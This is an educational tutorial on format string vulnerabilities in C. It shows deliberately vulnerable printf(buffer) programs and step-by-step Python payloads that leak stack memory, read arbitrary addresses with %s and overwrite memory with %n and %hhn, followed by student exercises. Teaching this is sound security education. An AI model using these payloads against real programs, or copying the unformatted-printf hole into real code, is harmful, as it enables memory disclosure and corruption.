Format strings

We now study another classic program exploitation technique. A format string is a string containing format directives such as %d and %s in printf. These directives are interpreted and substituted with appropriate values. For example:

printf("Result: %d",r);

substitutes %d with the value of integer variable r and prints the resulting string.

A classic mistake is to directly print a string s without specifying a format. A string should always be printed as follows:

printf("%s",s)

Consider now the following piece of code, where the string buffer is printed directly, without specifying a format "%s":

#include

int main(void) {
    char buffer[128];

    printf("Please insert a string: ");
    /* no buffer overflow! */
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);

    return 0;
}

Printing a string this way is a security vulnerability: if we provide, as input, strings containing format directives, these will be interpreted and will leak (and possibly modify) memory values. We show some examples below.

$ gcc format.c -o format
format.c: In function ‘main’:
format.c:9:5: warning: format not a string literal and no format arguments [-Wformat-security]
$ ./format 
Please insert a string: ciao
ciao
$ ./format
Please insert a string: ciao.%08x
ciao.00000080
$ ./format
Please insert a string: ciao.%08x.%08x.%08x
ciao.00000080.b7fd1c20.b7fff900

First notice that the compiler rises a security warning regarding the direct printf of a string. Programmers should always take this warning seriously and fix the issue.

Let us now analyse what is happening: The call to printf in the program interprets %08x as a format directive and prints (as hexadecimal) the first parameter of printf, padded with zeros up to 8 digits. The problem is that there are no parameters! The printf function looks for the first parameter on the top of the stack of the calling function, since parameters are pushed on the stack just before calling a function as depicted below:

saved ebp (calling function)
return address (calling function)
first parameter
second parameter
….

So, if we go on adding format directives we can print the whole stack of the calling function. Since the string we are printing is stored on the stack in the buffer array, if we print enough words we will soon or later find it. A trick to immediately see the string is to prepend an easy to see pattern such as the “classic” AAAA (41414141 in hexadecimal), as shown in the following example:

$ python -c 'print "AAAA" + ".%08x"*8'
AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
$ python -c 'print "AAAA" + ".%08x"*8' | ./format 
Please insert a string: AAAA.00000080.b7fd1c20.b7fff900.00000000.b7fff800.252d465a.41414141.3830252e

It is easy to see the word containing 41414141, which is the beginning of our string.

Direct access to parameters

Once we know the position on the stack (in this case it is the seventh word on the stack) we can refer directly to the corresponding parameter as follows:

$ python -c 'print  "AAAA" + ".%7$08x"' | ./format 
Please insert a string: AAAA.41414141

The format %7$08x is like %08x but instead of printing the next parameter on the stack it prints the one specified before the dollar symbol, the seventh in this case. We can also print the same parameter more than once:

$  python -c 'print  "AAAA" + ".%7$08x.%7$08x"' | ./format 
Please insert a string: AAAA.41414141.41414141

Exercise

Try to reveal the content of the PIN array (containing a secret PIN) through a format string attack. Hint: Since the array is allocated on the stack, use %x and not %s.

#include
#include
 
int main(void) {
    char buffer[128];
    char PIN[128];

    strcpy(PIN,"1234");
        
    printf("Please insert a string: ");
    fgets(buffer, sizeof(buffer), stdin); // no buffer overflow!
    printf("%p, %p, \n",buffer,PIN);
    printf(buffer);
 
    return 0;
}

Printing arbitrary memory locations

Now that we know where our string is located on the stack we can do more. The format directive %s is used to print strings: the corresponding parameter on the stack is interpreted as the string address and the pointed string is consequently printed (the pointer is dereferenced!). This allows us for printing a string at an arbitrary memory location: we replace AAAA with the target address and we place a %s in the format string in the place corresponding to the 41414141 output. This will interpret our address as a pointer to the string and will print the string starting at such an address.

Exercise

Consider the following program and try to print the supersecret string using the technique discussed above.

#include

const char supersecret[] = "This is a ultrasuperdupersecret string";

int main(int argc, char *argv[]) {
    char buffer[128];

    printf("Please insert a string: ");
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);

    return 0;
}

Notice that the string is NOT on the stack, thus it would never be printed by increasing the number of %x directives in the format string.

Hint: You can use objdump -D and/or gdb to find the string address.

The following video illustrates the solution (try yourself before watching this):

Writing with format strings

So far, we have seen how to print the content of arbitrary memory locations. There exist format directives that modify memory. We can try to exploit them to modify the content of a memory address. In particular, we illustrate the %n directive that writes into an integer variable the number of bytes written so far by the printf. Try the following example:

#include
main() {
    int n1,n2;

    printf("Number of bytes written up to this point%n are stored in n1 and the "
           "ones up to this point%n are stored in n2!\n", &n1, &n2);
    printf("n1: %i, n2: %i\n",n1,n2);
}

We obtain the following output

$ ./a.out 
Number of bytes written up to this point are stored in n1 and the ones up to this point are stored in n2!
n1: 40, n2: 87
$

Using echo and wc we can double check that 40 and 87 are, in fact, the number of bytes written up to the point where the two %n are placed:

$ echo -n "Number of bytes written up to this point" | wc -c
40
$ echo -n "Number of bytes written up to this point are stored in n1 and the ones up to this point" | wc -c
87

Consider our previous example modified as follows:

#include
 
const char supersecret[] = "This is a ultrasuperdupersecret string";
 
int main(int argc, char *argv[]) {
    char buffer[128];

    printf("Supersecret string is at the address %p and contains '%s', %08x\n",
       supersecret,supersecret,*(int *)supersecret);    
    printf("Please insert a string: ");
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);
    printf("Supersecret string is at the address %p and contains '%s', %08x\n",
       supersecret,supersecret,*(int *)supersecret); 
    return 0;
}

It prints the address, the string and the first four bytes of the string in hexadecimal notation, before and after the input of the format string (i.e., where the format string attack happens):

$ ./write_supersecret 
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: AAAA
AAAA
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854

We now know the address of the string 0x08048640 and we can easily reproduce the attack that leaks the supersecret string on this particular code:

$ python -c 'print "AAAA" + ".%11$08x"' | ./write_supersecret 
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: AAAA.41414141
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854

$ python -c 'print "\x40\x86\x04\x08" + ".%11$s"' | ./write_supersecret                                                                    
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: .This is a ultrasuperdupersecret string
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854

Now, if we replace %s with %n in the attack we should, in principle, be able to write on the string.

$ python -c 'print "\x40\x86\x04\x08" + ".%08x"*10 + "%n"' | ./write_supersecret                                                           
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854
Segmentation fault

it did not work, and we get a segmentation fault error instead! To understand what is happening we examine program sections with objdump -h

$ objdump -h ./write_supersecret
./write_supersecret:     file format elf32-i386

Sections:
....
 12 .fini         00000014  080485f4  080485f4  000005f4  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       000000a2  08048620  08048620  00000620  2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame_hdr 0000002c  080486c4  080486c4  000006c4  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
....

Our string is in a read-only section .rodata which goes from address 0x08048620 to address 0x080486c2 (0x08048620 + 0xa2), from which the segmentation fault. In fact we are declaring the variable as

const char supersecret[] = "This is a ultrasuperdupersecret string";

which is a constant char array. We need to remove the const modifier to make it writable:

char supersecret[] = "This is a ultrasuperdupersecret string";

Now the variable is in a read-write segment .data. In fact, the elements of an array should be modifiable:

$ ./write_supersecret_writable                             
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: AAAA
AAAA
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
$ objdump -h ./write_supersecret_writable
....
 21 .got.plt      00000020  0804a000  0804a000  00001000  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .data         00000047  0804a020  0804a020  00001020  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 23 .bss          00000008  0804a068  0804a068  00001067  2**2
                  ALLOC
....

We try again to write on the string:

$ python -c 'print "\x40\xa0\x04\x08" + ".%11$s"' | ./write_supersecret_writable 
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: .This is a ultrasuperdupersecret string
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854

$ python -c 'print "\x40\xa0\x04\x08" + ".%11$n"' | ./write_supersecret_writable 
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: .
Supersecret string is at the address 0x804a040 and contains '', 00000005

We did it! The first byte of the string has been written with the number of written bytes 0x05, which is the first four bytes of address \x40\xa0\x04\x08 plus the dot before %11$n.

Notice that by declaring the variable as

char *supersecret = "This is a ultrasuperdupersecret string";

we would also get a segmentation fault error as, in this case, the string would be stored into the read-only section and only the pointer to it, named supersecret, would be modifiable.

Writing something useful

The technique becomes interesting if we can have control on what we write. An easy way to do this is to use %100x which writes 100 characters (the output is padded with spaces as needed to reach the 100 limit). So if we want to write 0xbeef we can compute 0xbeef - 0x4 = 48875 and add a %48875x directive before the %11$n, so that the number written will be 48875 + 4 (the four bytes of the address). Let’s try it:

$ python -c 'print "\x40\xa0\x04\x08" + "%48875x%11$n"' | ./write_supersecret_writable
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: @
....
                  80
Supersecret string is at the address 0x804a040 and contains ', 0000beef

It worked! we have written 0xbeef on the two bytes of the word! Notice that the string is very long (0xbeef=48879 bytes in fact). We can make a much shorter payload attack writing byte by byte as shown in the following example.

Example

We show how to write 0xfeedbeef byte by byte little-endian as 0xef 0xbe 0xed 0xfe.

To write four bytes we can put the four addresses one after the other and refer to them using the direct access to parameters trick above. We also use the hh directive before the n to indicate we are writing a half-half-word which is a byte.

$ python -c 'print "\x40\xa0\x04\x08\x41\xa0\x04\x08\x42\xa0\x04\x08\x43\xa0\x04\x08" + "%11$hhn%12$hhn%13$hhn%14$hhn"' | ./write_supersecret_writable
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: @ABC�
Supersecret string is at the address 0x804a040 and contains ' is a ultrasuperdupersecret string', 10101010

Good! We have written 0x10 on the four bytes which is 16 in decimal. In fact, we now have 4 addresses of 4 bytes which give 16 written bytes. The four hhn directives writes 16 on the corresponding addresses.

To write 0xef 0xbe 0xed 0xfe we now have to compute how much padding we need to insert before the respective hhn directives.
We start from the first byte. We can do the math it in a python shell as follows:

>>> 0xef - 0x10
223

We thus add a %223x directive before the %11$hhn:

$ python -c 'print "\x40\xa0\x04\x08\x41\xa0\x04\x08\x42\xa0\x04\x08\x43\xa0\x04\x08" + "%223x%11$hhn%12$hhn%13$hhn%14$hhn"' | ./write_supersecret_writable
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: @ABC
...
80
Supersecret string is at the address 0x804a040 and contains ' is a ultrasuperdupersecret string', efefefef

It works! We have written 0xef on the four bytes. We can now go on computing the padding to write the second byte.

>>> 0xbe - 0xef
-49

Uh! The second byte is supposed to be 0xbe which is less than 0xef. No problem. We observe that in order to write 0xbe we can in fact write 0x1be since the hhn directive will only write one byte, i.e., 0xbe.

Thus for the following three bytes we have:

>>> 0x1be - 0xef
207
>>> 0xed - 0xbe
47
>>> 0xfe - 0xed
17

Now we can directly add %207x, %47x, %17x before %12$hhn, %13$hhn, %14$hhn, respectively.

$ python -c 'print "\x40\xa0\x04\x08\x41\xa0\x04\x08\x42\xa0\x04\x08\x43\xa0\x04\x08" + "%223x%11$hhn%207x%12$hhn%47x%13$hhn%17x%14$hhn"' | ./write_supersecret_writable
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: @ABC
...
Supersecret string is at the address 0x804a040 and contains '� is a ultrasuperdupersecret string', feedbeef

Good, we did it!

Exercise 1

Write 0xdeadbeef on the four bytes of the string.

Exercise 2

Write again 0xdeadbeef using the hn directive that writes a half-word, i.e., 2 bytes. In this variant you only need two %n directives and two addresses of the half-words.

Exercise 3

Write “beef” at the beginning of the string so to overwrite “This”. Try also to terminate the string right after “beef”.